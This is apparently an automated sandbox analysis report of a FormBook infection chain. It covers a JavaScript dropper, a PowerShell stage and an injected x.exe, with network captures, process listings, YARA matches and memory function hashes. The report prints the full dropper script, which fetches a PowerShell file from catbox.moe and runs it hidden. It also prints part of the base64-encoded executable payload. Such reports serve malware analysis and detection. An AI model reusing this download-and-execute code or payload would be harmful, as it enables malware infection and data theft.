PBcedLXQezKXZV1ei1tmt/e64Y03ErPkX+VB8opwfGl/29QkthZNQsGUONo0xQzTR8mE221u/eo/6+vr6GMWfS+L+kQVUDQ7SdtvUq915ON8X4Iea6BWNUq0xm+4pVsR437PtGHIAg0D0oD5mBlbid/+YbA0crxZcsf7vKnJHc3m+clwb/5wG7zezeLjhkofFBWNReBn2c4dAPO9DIlHogHUKOMb7n2fOM3v5T3FNBTtHYkm6ni1UdBNzh9hyCs

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	108.181.20.35	443	3448	C:\Users\user\AppData\Local\Temp\x.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 06:50:13 UTC	52	OUT	GET /t7rwbh.txt HTTP/1.1 Host: files.catbox.moe
2024-12-19 06:50:13 UTC	558	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 19 Dec 2024 06:50:13 GMT Content-Type: text/plain Content-Length: 37548 Last-Modified: Wed, 18 Dec 2024 06:34:09 GMT Connection: close Vary: Accept-Encoding ETag: "67626ce1-92ac" X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self'; Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD Accept-Ranges: bytes
2024-12-19 06:50:13 UTC	15826	IN	Data Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 45 41 44 5a 55 2b 37 67 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 51 59 41 41 47 41 41 41 41 41 4b 41 41 41 41 41 41 41 41 54 6e 34 41 41 41 41 67 41 41 41 41 67 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEEADZU+7gAAAAAAAAAAOAADiELAQYAAGAAAAAKAAAAAAAATn4AAAAgAAAAgAAAAABAAAAgAAAAAgA
2024-12-19 06:50:14 UTC	16384	IN	Data Raw: 68 4a 59 44 45 41 53 30 46 51 4e 33 4e 35 5a 32 55 35 51 6b 78 6d 4d 6e 64 72 53 30 39 68 41 47 45 35 51 6a 5a 45 62 32 4a 4a 4d 31 5a 44 4e 55 67 31 51 32 35 52 4e 51 42 4e 65 56 4e 6c 64 48 52 70 62 6d 64 7a 41 45 5a 53 52 55 46 4c 57 53 35 4e 65 51 42 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 4e 6c 64 48 52 70 62 6d 64 7a 51 6d 46 7a 5a 51 42 54 65 58 4e 30 5a 57 30 75 51 32 39 75 5a 6d 6c 6e 64 58 4a 68 64 47 6c 76 62 67 42 4e 65 56 4e 6c 64 48 52 70 62 6d 64 7a 55 48 4a 76 63 47 56 79 64 48 6b 41 55 6e 56 75 55 45 55 41 65 46 64 56 4f 54 68 57 5a 6c 45 78 62 6d 56 71 61 31 4a 45 64 6e 64 4f 41 45 31 31 62 48 52 70 59 32 46 7a 64 45 52 6c 62 47 56 6e 59 58 52 6c 41 45 64 4d 62 58 56 51 64 55 39 79 55 30 78 6f 56 58 52 30 63 6d 39 47 63 51 42 49 59 Data Ascii: hJYDEAS0FQN3N5Z2U5QkxmMndrS09hAGE5QjZEb2JJM1ZDNUg1Q25RNQBNeVNldHRpbmdzAEZSRUFLWS5NeQBBcHBsaWNhdGlvblNldHRpbmdzQmFzZQBTeXN0ZW0uQ29uZmlndXJhdGlvbgBNeVNldHRpbmdzUHJvcGVydHkAUnVuUEUAeFdVOThWZlExbmVqa1JEdndOAE11bHRpY2FzdERlbGVnYXRlAEdMbXVQdU9yU0xoVXR0cm9GcQBIY
2024-12-19 06:50:14 UTC	5338	IN	Data Raw: 4a 6a 5a 57 35 30 52 33 4a 76 64 58 42 54 5a 58 42 68 63 6d 46 30 62 33 49 4e 63 47 56 79 59 32 56 75 64 46 4e 35 62 57 4a 76 62 41 35 77 5a 58 4a 4e 61 57 78 73 5a 56 4e 35 62 57 4a 76 62 41 78 75 59 58 52 70 64 6d 56 45 61 57 64 70 64 48 4d 4b 62 56 39 6b 59 58 52 68 53 58 52 6c 62 52 4e 75 64 57 31 69 5a 58 4a 45 5a 57 4e 70 62 57 46 73 52 47 6c 6e 61 58 52 7a 46 57 4e 31 63 6e 4a 6c 62 6d 4e 35 52 47 56 6a 61 57 31 68 62 45 52 70 5a 32 6c 30 63 78 64 6a 64 58 4a 79 5a 57 35 6a 65 56 42 76 63 32 6c 30 61 58 5a 6c 55 47 46 30 64 47 56 79 62 68 64 6a 64 58 4a 79 5a 57 35 6a 65 55 35 6c 5a 32 46 30 61 58 5a 6c 55 47 46 30 64 47 56 79 62 68 56 75 64 57 31 69 5a 58 4a 4f 5a 57 64 68 64 47 6c 32 5a 56 42 68 64 48 52 6c 63 6d 34 57 63 47 56 79 59 32 56 75 64 Data Ascii: JjZW50R3JvdXBTZXBhcmF0b3INcGVyY2VudFN5bWJvbA5wZXJNaWxsZVN5bWJvbAxuYXRpdmVEaWdpdHMKbV9kYXRhSXRlbRNudW1iZXJEZWNpbWFsRGlnaXRzFWN1cnJlbmN5RGVjaW1hbERpZ2l0cxdjdXJyZW5jeVBvc2l0aXZlUGF0dGVybhdjdXJyZW5jeU5lZ2F0aXZlUGF0dGVybhVudW1iZXJOZWdhdGl2ZVBhdHRlcm4WcGVyY2Vud

Target ID:	0
Start time:	01:50:01
Start date:	19/12/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT copy.js"
Imagebase:	0x7ff6c7970000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	01:50:04
Start date:	19/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:50:04
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:50:07
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\x.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\x.exe"
Imagebase:	0xaf0000
File size:	10'752 bytes
MD5 hash:	DF1F48D5D5C174AA6AB5910BB41064FB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:50:13
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\x.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\x.exe"
Imagebase:	0xf70000
File size:	10'752 bytes
MD5 hash:	DF1F48D5D5C174AA6AB5910BB41064FB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1951239959.00000000017F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1951239959.00000000017F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

JavaScript Code

Call Graph

Executed
Not Executed

Script:

Code
0	var URL = "https://files.catbox.moe/ugok5m.ps1";
1	var DownloadPath = "C:\\Temp\\dddddd.ps1";
2	var TEMP_DIR = "C:\\Temp";
3	var SUCCESS_STATUS = 200;
4	var POWERSHELL_CMD = "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ";
5	var shell = WScript.CreateObject ( "WScript.Shell" );	Windows Script Host.CreateObject("WScript.Shell") ➔
6	var fileSystem = WScript.CreateObject ( "Scripting.FileSystemObject" );	Windows Script Host.CreateObject("Scripting.FileSystemObject") ➔
7	var http = WScript.CreateObject ( "MSXML2.XMLHTTP" );	Windows Script Host.CreateObject("MSXML2.XMLHTTP") ➔
8	if ( ! fileSystem.FolderExists ( TEMP_DIR ) )	FolderExists("C:\Temp") ➔ false
9	{
10	fileSystem.CreateFolder ( TEMP_DIR );	CreateFolder("C:\Temp") ➔ C:\Temp
11	}
12	function DownloadScript(url, path) {	DownloadScript("https://files.catbox.moe/ugok5m.ps1","C:\Temp\dddddd.ps1") ➔ true
13	try
14	{
15	http.Open ( "GET", url, false );	Open("GET","https://files.catbox.moe/ugok5m.ps1",false) ➔ undefined
16	http.Send ( );	Send() ➔ undefined
17	if ( http.Status === SUCCESS_STATUS )
18	{
19	var file = fileSystem.CreateTextFile ( path, true );	CreateTextFile("C:\Temp\dddddd.ps1",true) ➔
20	file.Write ( http.ResponseText );	Write("$p=[IO.Path]::Combine($env:TEMP,"x.exe") [IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAQjhdcAAAAAAAAAAOAALgELAQYAACAAAAAIAAAAAAAADj8AAAAgAAAAQAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAMA+AABLAAAAAEAAAJgFAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAB4PgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAFB8AAAAgAAAAIAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAJgFAAAAQAAAAAYAAAAiAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAKAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADwPgAAAAAAAEgAAAACAAUAUCkAAHAUAAADAAIAEAAABsA9AAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEYrAiYWKwImFgIoBQAABgAAKgAAEzADANYAAAABAAARKwImFiAAAAAAOGcAAAAHgAEAAAQgBQAAADhXAAAAAH4BAAAEFP4BCigGAAAGKAcAAAY6aAAAACYgBAAAACgGAAAGOi4AAAAmAHIBAABw0AMAAAIoCAAABm8PAAAKcxAAAAoLODIAAAAgAAAAAP4OAwD+DAMARQgAAACE////EAAAAHT///8AAAAAEAAAACIAAACu////NQAAADhv////JiACAAAAOMv///8GOQ0AAAAgBgAAABY5uv///yYAfgEAAAQMIAcAAAAXOqf///8mOAAAAAAIKgAAEzACABIAAAACAAARKwImFgB+AgAABAo4AAAAAAYqAAAyKwImFgACgAIAAAQqAAAAOisCJhb+CQAAKBEAAAoqABorAiYWFyoAGisCJhYWKgA+KwImFgD+CQAAKBIAAAoqEzACABIAAAADAAARKwImFgB+AwAABAo4AAAAAAYqAABCKwImFisCJhYCKA4AAAYAKgAAAHYrAiYWKwImFnMKAAAGKA8AAAZ0BAAAAoADAAAEKgAAGisCJhYXKgAaKwImFhYqADorAiYW/gkAACgTAAAKKgA+KwImFgD+CQAAKBQAAAoqGzAFAOcBAAAEAAARKwImFiAEAAAAODcAAAAAONIBAAAg8A8AACgVAAAKIAYAAAA4HQAAAAByOQAAcCgWAAAKOC4AAAAgBAAAAP4OCgD+DAoARQcAAAAQAAAAwv///8L///8AAAAAPgAAAKj///9TAAAAOKP///8mIAUAAAA4z////ygVAAAGOAEAAAAXCgY5jP///ygWAAAGKBcAAAY61P///yYgAQAAABY5ov///yYAKBQAAAY60f///yAAAAAAOIz///8AAHKDAABwKBIAAAYLIAMAAAA4TgAAAAcoFwAACgwWKBYAAAY5wQAAACYgBQAAADgxAAAAAHLLAABwKBYAAAogCAAAABc6GwAAACYJKBgAAAoTBDiBAAAAIAMAAAD+DgkA/gwJAEUJAAAACgAAAGcAAAC9////if///1cAAABnAAAASwAAAKb///93AAAAIAYAAAA4zf///xqNFAAAASUWEQWiJRd+GQAACqIlGAiiJRkXjAQAAAGiEwYRBBEGKBEAAAYW/gETBxEHOTgAAAAgBwAAADiM////KBoAAApvGwAAChMFOK7///8mIAAAAAA4cP///ygTAAAGDSACAAAAOGD///8AAADdIAAAABMIAHLxAABwEQhvHAAACigdAAAKKBYAAAoAAN0AAAAAKgBBHAAAAAAAALoAAAAMAQAAxgEAACAAAAAdAAABGzAHAJ0BAAAFAAARKwImFiABAAAAKBcAAAY5QgEAACY4IQEAAAAAAnIZAQBwKBgAAAYlOh4AAAAmFygXAAAGOlUAAAAmIAMAAAAWOSsAAAAmOE4AAAByMwEAcCAAAQAAFBQDKB4AAAomOCYAAAAgAwAAAP4OBQD+DAUARQUAAAC9////AAAAABAAAAC9////JAAAADgLAAAAJiACAAAAONf///9yPwEAcCgZAAAGIAQAAAA4w////wAXC93nAAAADAByawEAcAaMAwAAAQgoGgAABigbAAAGKBkAAAYABhn+BA0JORgAAAAAcpsBAHAoFgAACgAg0AcAACgfAAAKAAAA3QAAAAAABhdYCiAGAAAAOEsAAAARBDoI////OBgAAAAmIAAAAAA4NAAAAAAXCiACAAAAOCcAAAAWCyAHAAAAOBsAAAAGGf4CFv4BEwQ4MgAAACABAAAA/g4GAP4MBgBFCAAAALT///+n////mv7//5D///+X////kP///8D///8cAAAAFygXAAAGOpH///8mIAUAAAAoFgAABjrA////JjgAAAAAByoAAAABEAAAAAAaAJq0AEcdAAABGzADANkAAAAGAAARKwImFigWAAAGKBcAAAY6ZwAAACYgAgAAACgWAAAGOh4AAAAmBnKzAQBwbyAAAAo4UQAAACACAAAA/g4EAP4MBABFBgAAAAoAAAAXAAAACgAAACcAAADG////PwAAACADAAAAONn///8AAigcAAAGdCUAAAEKOKr///8mIAQAAAA4vP///wAGbyEAAAoLIAUAAAAoFgAABjql////JgdvIgAACigdAAAGcyMAAAoMAAhvJAAACg3dHAAAAAg5BwAAAAhvJQAACgDcBzkHAAAABygeAAAGANwJKgAAAAEcAAACAK4ADbsADgAAAAACAJ0ALMkADgAAAAATMAMAkQAAAAcAABErAiYWFigWAAAGOW4AAAAmIAEAAAAoFgAABjo8AAAAJgByuwEAcAogAwAAADgqAAAABygXAAAKDCAFAAAAOBkAAAAGKBIAAAYLOCoAAAAgAQAAAP4OAwD+DAMARQYAAACo////qP///wAAAADK////uf///xIAAAA4tP///yYgBAAAABY50v///yY4AAAAAAgqAAAAEzACACIAAAAIAAARKwImFgAoJgAACjoKAAAAKB8AAAY4AQAAABcKOAAAAAAGKgAAEzADAM0AAAAJAAARKwImFhYoFgAABjlxAAAAJiABAAAAOEQAAAAoJwAACnIDAgBwKCAAAAY6kAAAACAFAAAAOCYAAAAoKAAACnITAgBwbykAAAo6eAAAADgqAAAAIAEAAAD+DgEA/gwBAEUGAAAAEAAAABAAAAAAAAAAvf///5////8vAAAAOJr///8mIAQAAAA40////wAoKAAACnIDAgBwKCAAAAY6JAAAACADAAAAOLT///8oJwAACnITAgBwbykAAAo4AQAAABc4AQAAABcKOAAAAAAGKgAAABorAiYWFyoAGisCJhYWKgBKKwImFv4JAAD+CQEAbyoAAAoqAD4rAiYWAP4JAAAoFgAACio6KwImFv4JAABvHAAACioAXisCJhYA/gkAAP4JAQD+CQIAKCsAAAoqPisCJhYA/gkAACgsAAAKKi4rAiYWACgtAAAKKjorAiYW/gkAAG8lAAAKKgAuKwImFgAoLgAACipKKwImFv4JAAD+CQEAbykAAAoqAEJTSkIBAAEAAAAAAAwAAAB2NC4wLjMwMzE5AAAAAAUAbAAAAAwGAAAjfgAAeAYAAKAIAAAjU3RyaW5ncwAAAAAYDwAAHAIAACNVUwA0EQAAEAAAACNHVUlEAAAARBEAACwDAAAjQ") ➔ undefined
21	file.Close ( );	Close() ➔ undefined
22	return true;
23	}
24	else
25	{
26	LogError ( "Download failed with status: " + http.Status );
27	return false;
28	}
29	}
30	catch ( e )
31	{
32	LogError ( "Error downloading script: " + e.message );
33	return false;
34	}
35	}
36	function LogError(message) {
37	WScript.Echo ( message );
38	}
39	function RunPowerShellScript(scriptPath) {	RunPowerShellScript("C:\Temp\dddddd.ps1") ➔ undefined
40	try
41	{
42	var powerShellCommand = POWERSHELL_CMD + "\"" + scriptPath + "\"";
43	shell.Run ( powerShellCommand, 0, true );	Run("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"",0,true) ➔ 0
44	}
45	catch ( e )
46	{
47	LogError ( "Failed to execute PowerShell script: " + e.message );
48	}
49	}
50	if ( DownloadScript ( URL, DownloadPath ) )	DownloadScript("https://files.catbox.moe/ugok5m.ps1","C:\Temp\dddddd.ps1") ➔ true
51	{
52	RunPowerShellScript ( DownloadPath );	RunPowerShellScript("C:\Temp\dddddd.ps1") ➔ undefined
53	}
54	else
55	{
56	LogError ( "Exiting script due to download failure." );
57	WScript.Quit ( );
58	}

Reset < >

Analysis Process: powershell.exePID: 6896, Parent PID: 6632COMMON

Executed Functions

Function 00007FFD9B5E0000 Relevance: 1.4, Instructions: 1373COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1805665116.00007FFD9B5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b5e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ed20a3bbb7c1747feb5a31222d4429bba0bf2573911fffaf161108d66df9e2c
Instruction ID: 0cb64553e75cabda11aaf4c0762a84bd8deb5598bf2d97283b8cc2caaf02338d
Opcode Fuzzy Hash: 1ed20a3bbb7c1747feb5a31222d4429bba0bf2573911fffaf161108d66df9e2c
Instruction Fuzzy Hash: A6921462A0EBC91FE7E7DB6848666657BE1EF56610F0E01FBD088CB0E3D918AD05C351

Function 00007FFD9B5E07F7 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1805665116.00007FFD9B5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b5e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0edff9ad28010bd180337e6ae09093876e14f758cb97306e02ab5874ea03aa4c
Instruction ID: 5ade34ccce914b35877335007e39044727c6aef0b2472daa74edc9a1b8fcc780
Opcode Fuzzy Hash: 0edff9ad28010bd180337e6ae09093876e14f758cb97306e02ab5874ea03aa4c
Instruction Fuzzy Hash: 4C11C822F1E90E5BE6FED258647717952C1EF94B10B8E01B9E84DC21E7DE186D4182C1

Function 00007FFD9B5137B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1805256616.00007FFD9B510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b510000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction ID: ec7eb3999733a90e561267c7f67114b4c98ec2467302e526c473d2f43ce5d7c7
Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction Fuzzy Hash: E001AC7010CB0D4FD744DF0CD051AA5B3E0FB95320F10056DE58AC3561D632E982C741

Analysis Process: x.exePID: 3448, Parent PID: 6896COMMON

Execution Graph

Execution Coverage:	27.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	75%
Total number of Nodes:	32
Total number of Limit Nodes:	0

Executed Functions

Function 0145422E Relevance: .9, Instructions: 926
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1450000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f57f0951b7de478b9664198f5bf8874df6254022b4db8b3a14fd0a8efbb9288
Instruction ID: a5cdbc5f1c2fb5f3e4050b9f28eaea94b982f72cada852747ab276718bdf5960
Opcode Fuzzy Hash: 7f57f0951b7de478b9664198f5bf8874df6254022b4db8b3a14fd0a8efbb9288
Instruction Fuzzy Hash: D6A2C274A012298FDBA4DF69C894BDDBBB1BF48300F1485EA944DAB261DB309EC5CF51

Function 01453028 Relevance: .4, Instructions: 401
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1450000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff924c837190fc601b225e806055a80933eb01a59b87a307db4590be7a5aaec1
Instruction ID: 92e40fa35a781db4ffb6488ac5e0c481f5020e51ede30c1a5e7999de71b440eb
Opcode Fuzzy Hash: ff924c837190fc601b225e806055a80933eb01a59b87a307db4590be7a5aaec1
Instruction Fuzzy Hash: E8F14E74E002198FDB54DFA8C890B9DBBB6BF88314F54C06AE908A7352DB349E85CF51

Function 01450848 Relevance: .2, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1450000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb184520e1a418582964907ba211b6a79aeef247b19e283991d41a32d229e0e3
Instruction ID: 4b4f05d66d954fd3f636555433fe2aae898424a6f43ec10599d99d7039a0a62c
Opcode Fuzzy Hash: eb184520e1a418582964907ba211b6a79aeef247b19e283991d41a32d229e0e3
Instruction Fuzzy Hash: 549115B8D05218CFDB54DFA9D884BADBBB1BF49300F10806AE809B7366EB355985CF00

Function 014507D0 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1450000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc0823743cbcc4e6ef124fc6715b0407019c523bc1de6b65293f7a3fc0e048f2
Instruction ID: c08561c33387e12734e73840e5e04f3c5be242995e520bd1bc605b5289f768c0
Opcode Fuzzy Hash: fc0823743cbcc4e6ef124fc6715b0407019c523bc1de6b65293f7a3fc0e048f2
Instruction Fuzzy Hash: E58123B8D05218CFDB54DFA9D884BADBBB1FF49304F10846AE849A7366EB345985CF00

Function 01450838 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1450000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c3c6d5a8071fd5a5694eb164c76125c6cffd38e0f5e89decf9a6df341541530
Instruction ID: f4011a7f1781b1ee0e1e925c9c9dd9a7e88b6844b9bf06790855ce3d6e362fbc
Opcode Fuzzy Hash: 6c3c6d5a8071fd5a5694eb164c76125c6cffd38e0f5e89decf9a6df341541530
Instruction Fuzzy Hash: 408103B8D01218CFDB54DFA9D984BADBBB1FF49300F10856AE849A7366EB355985CF00

Function 01455862 Relevance: 2.0, APIs: 1, Instructions: 528
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 01455C8F

Memory Dump Source

Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1450000_x.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: eb23bc18904d4d86646a55ccd0d3bc841127fbb6e737c316983f0f9ad66fb053
Instruction ID: 07ac970ab6652057d55360f50a4b26f7c2039fd253b35d882aad6563ca7508a8
Opcode Fuzzy Hash: eb23bc18904d4d86646a55ccd0d3bc841127fbb6e737c316983f0f9ad66fb053
Instruction Fuzzy Hash: AC515BB1D093989FCB02CFA8D8906DDBFF0AF5A310F1580AAD444AB252D3785989CF65

Function 01455344 Relevance: 1.8, APIs: 1, Instructions: 324
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01455617

Memory Dump Source

Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1450000_x.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 833c101227653436fde7406de914905ce252349aaf1eeab495018a2c28f99011
Instruction ID: c5f12f552d3e56e727d95ba148039fcc403cc146e3132cbe01b78822303fcb1a
Opcode Fuzzy Hash: 833c101227653436fde7406de914905ce252349aaf1eeab495018a2c28f99011
Instruction Fuzzy Hash: AAC12771D00219CFDB64CFA8C8407EEBBB1BF49314F0495AAD849BB250DB749A85CF95

Function 01455350 Relevance: 1.8, APIs: 1, Instructions: 321
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01455617

Memory Dump Source

Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1450000_x.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: ad95ba67345a0b53bfaf8346a3dede4eab14d1f79ae059115e241a713cc8d6a3
Instruction ID: 495fffb9beb15de767d076220430fbbe55d0c37c95988d523bb2232a94bb7738
Opcode Fuzzy Hash: ad95ba67345a0b53bfaf8346a3dede4eab14d1f79ae059115e241a713cc8d6a3
Instruction Fuzzy Hash: 26C11671D0021D8FDB64CFA8C840BEEBBB1BF49314F0495AAD849BB250DB749A85CF95

Function 01455E30 Relevance: 1.6, APIs: 1, Instructions: 120
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 01455F0B

Memory Dump Source

Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1450000_x.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 103862a9e181220c2a52945d91adfbeba943b42b9ece37513401a14492120c47
